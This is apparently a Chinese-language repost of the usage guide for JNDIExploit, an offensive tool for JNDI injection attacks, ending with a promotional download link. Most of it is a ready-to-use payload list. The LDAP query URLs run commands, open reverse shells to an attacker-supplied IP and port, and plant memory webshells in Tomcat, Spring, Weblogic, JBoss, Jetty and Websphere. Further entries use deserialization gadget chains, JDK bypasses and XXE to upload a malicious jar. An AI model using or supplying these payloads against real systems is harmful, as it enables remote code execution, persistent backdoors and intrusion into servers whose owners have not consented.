# 簡介
JNDIExploit一款用于?JNDI注入
?利用的工具,大量參考/引用了?Rogue JNDI
?項目的代碼,集成了JDNI注入格式,能夠更加方便的開啟服務端后直接利用,支持反彈Shell
、命令執行
、直接植入內存shell
等,并集成了常見的bypass 高版本JDK
的方式,適用于與自動化工具配合使用。
詳細使用文檔:JNDIExploit/README.md
# 相關截圖
# 快速使用
##服務端
快速開啟JNDIExploit服務端,默認開啟LDAP服務1389端口
與HTTP服務3456端口
,綁定<出口IP>
建議使用JDK8
開啟此服務,否則可能出現利用LDAP時服務端報錯。
java -jar JNDIExploit-1.3-SNAPSHOT.jar -i <你的出口IP>
##客戶端(注入端)
服務端輸入命令java -jar JNDIExploit-1.3-SNAPSHOT.jar -u
查看支持的JNDI注入格式,或者查看以下列表
Supported LADP Queries
* all words are case INSENSITIVE when send to ldap server
[+] Basic Queries: ldap://127.0.0.1:1389/Basic/[PayloadType]/[Params], e.g.
ldap://127.0.0.1:1389/Basic/Dnslog/[domain]
ldap://127.0.0.1:1389/Basic/Command/[cmd]
ldap://127.0.0.1:1389/Basic/Command/Base64/[base64_encoded_cmd]
ldap://127.0.0.1:1389/Basic/ReverseShell/[ip]/[port] ---windows NOT supported
ldap://127.0.0.1:1389/Basic/TomcatEcho
ldap://127.0.0.1:1389/Basic/SpringEcho
ldap://127.0.0.1:1389/Basic/WeblogicEcho
ldap://127.0.0.1:1389/Basic/TomcatMemshell1
ldap://127.0.0.1:1389/Basic/TomcatMemshell2 ---need extra header [Shell: true]
ldap://127.0.0.1:1389/Basic/JettyMemshell
ldap://127.0.0.1:1389/Basic/WeblogicMemshell1
ldap://127.0.0.1:1389/Basic/WeblogicMemshell2
ldap://127.0.0.1:1389/Basic/JBossMemshell
ldap://127.0.0.1:1389/Basic/WebsphereMemshell
ldap://127.0.0.1:1389/Basic/SpringMemshell
[+] Deserialize Queries: ldap://127.0.0.1:1389/Deserialization/[GadgetType]/[PayloadType]/[Params], e.g.
ldap://127.0.0.1:1389/Deserialization/URLDNS/[domain]
ldap://127.0.0.1:1389/Deserialization/CommonsCollectionsK1/Dnslog/[domain]
ldap://127.0.0.1:1389/Deserialization/CommonsCollectionsK2/Command/Base64/[base64_encoded_cmd]
ldap://127.0.0.1:1389/Deserialization/CommonsBeanutils1/ReverseShell/[ip]/[port] ---windows NOT supported
ldap://127.0.0.1:1389/Deserialization/CommonsBeanutils2/TomcatEcho
ldap://127.0.0.1:1389/Deserialization/C3P0/SpringEcho
ldap://127.0.0.1:1389/Deserialization/Jdk7u21/WeblogicEcho
ldap://127.0.0.1:1389/Deserialization/Jre8u20/TomcatMemshell1
ldap://127.0.0.1:1389/Deserialization/CVE_2020_2555/WeblogicMemshell1
ldap://127.0.0.1:1389/Deserialization/CVE_2020_2883/WeblogicMemshell2 ---ALSO support other memshells
[+] TomcatBypass Queries
ldap://127.0.0.1:1389/TomcatBypass/Dnslog/[domain]
ldap://127.0.0.1:1389/TomcatBypass/Command/[cmd]
ldap://127.0.0.1:1389/TomcatBypass/Command/Base64/[base64_encoded_cmd]
ldap://127.0.0.1:1389/TomcatBypass/ReverseShell/[ip]/[port] ---windows NOT supported
ldap://127.0.0.1:1389/TomcatBypass/TomcatEcho
ldap://127.0.0.1:1389/TomcatBypass/SpringEcho
ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell1
ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell2 ---need extra header [Shell: true]
ldap://127.0.0.1:1389/TomcatBypass/SpringMemshell
[+] GroovyBypass Queries
ldap://127.0.0.1:1389/GroovyBypass/Command/[cmd]
ldap://127.0.0.1:1389/GroovyBypass/Command/Base64/[base64_encoded_cmd]
[+] WebsphereBypass Queries
ldap://127.0.0.1:1389/WebsphereBypass/List/file=[file or directory]
ldap://127.0.0.1:1389/WebsphereBypass/Upload/Dnslog/[domain]
ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/[cmd]
ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/Base64/[base64_encoded_cmd]
ldap://127.0.0.1:1389/WebsphereBypass/Upload/ReverseShell/[ip]/[port] ---windows NOT supported
ldap://127.0.0.1:1389/WebsphereBypass/Upload/WebsphereMemshell
ldap://127.0.0.1:1389/WebsphereBypass/RCE/path=[uploaded_jar_path] ----e.g: ../../../../../tmp/jar_cache7808167489549525095.tmp
- 目前支持的所有?
PayloadType
?為Dnslog
: 用于產生一個DNS
請求,與?DNSLog
平臺配合使用,對Linux/Windows
進行了簡單的適配Command
: 用于執行命令,如果命令有特殊字符,支持對命令進行?Base64編碼
后傳輸ReverseShell
: 用于?Linux
?系統的反彈shell,方便使用TomcatEcho
: 用于在中間件為?Tomcat
?時命令執行結果的回顯,通過添加自定義header
?cmd: whoami
?的方式傳遞想要執行的命令SpringEcho
: 用于在框架為?SpringMVC/SpringBoot
?時命令執行結果的回顯,通過添加自定義header
?cmd: whoami
?的方式傳遞想要執行的命令WeblogicEcho
: 用于在中間件為?Weblogic
?時命令執行結果的回顯,通過添加自定義header
?cmd: whoami
?的方式傳遞想要執行的命令TomcatMemshell1
: 用于植入Tomcat內存shell
, 支持Behinder shell
?與?Basic cmd shell
TomcatMemshell2
: 用于植入Tomcat內存shell
, 支持Behinder shell
?與?Basic cmd shell
, 使用時需要添加額外的HTTP Header
?Shell: true
,?推薦使用此方式SpringMemshell
: 用于植入Spring內存shell
, 支持Behinder shell
?與?Basic cmd shell
WeblogicMemshell1
: 用于植入Weblogic內存shell
, 支持Behinder shell
?與?Basic cmd shell
WeblogicMemshell2
: 用于植入Weblogic內存shell
, 支持Behinder shell
?與?Basic cmd shell
,推薦使用此方式JettyMemshell
: 用于植入Jetty內存shell
, 支持Behinder shell
?與?Basic cmd shell
JBossMemshell
: 用于植入JBoss內存shell
, 支持Behinder shell
?與?Basic cmd shell
WebsphereMemshell
: 用于植入Websphere內存shell
, 支持Behinder shell
?與?Basic cmd shell
- 目前支持的所有?
GadgetType
?為URLDNS
CommonsBeanutils1
CommonsBeanutils2
CommonsCollectionsK1
CommonsCollectionsK2
C3P0
Jdk7u21
Jre8u20
CVE_2020_2551
CVE_2020_2883
WebsphereBypass
?中的 3 個動作:list
:基于XXE
查看目標服務器上的目錄或文件內容upload
:基于XXE
的jar協議
將惡意jar包
上傳至目標服務器的臨時目錄
# 下載
恭喜你發現寶藏站點哦,不妨點進去看看,絕對不會后悔的!
【JNDI注入利用工具】JNDIExploit v1.1 - 極核GetShell (get-shell.com)https://get-shell.com/4004.html